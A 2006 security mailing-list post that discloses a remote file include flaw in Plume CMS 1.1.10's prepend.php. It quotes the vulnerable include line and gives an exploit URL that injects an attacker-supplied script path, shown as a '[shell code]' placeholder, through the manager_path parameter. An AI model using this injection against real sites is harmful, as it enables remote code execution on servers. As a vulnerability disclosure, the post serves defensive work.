SecurityFocus

Plume CMS <= 1.1.10 [prepend.php] Remote File Include Vulnerability Sep 15 2006 10:11PM
D3nGeR Gmail CoM (1 replies)

Vendor: Plume CMS 1.1.10

Found By : D3nGeR

Scripit Site : http://plume-cms.net

in file [prepend.php]

;

include_once $_PX_config['manager_path'].'/inc/class.config.php'

code

http://site.com/[path]manager/frontinc/prepend.php?_PX_config[manager_pa
th]=[shell code ]

[ reply ]

Re: Plume CMS <= 1.1.10 [prepend.php] Remote File Include Vulnerability Sep 19 2006 02:43AM
Craig Morrison (craig fishpalace org)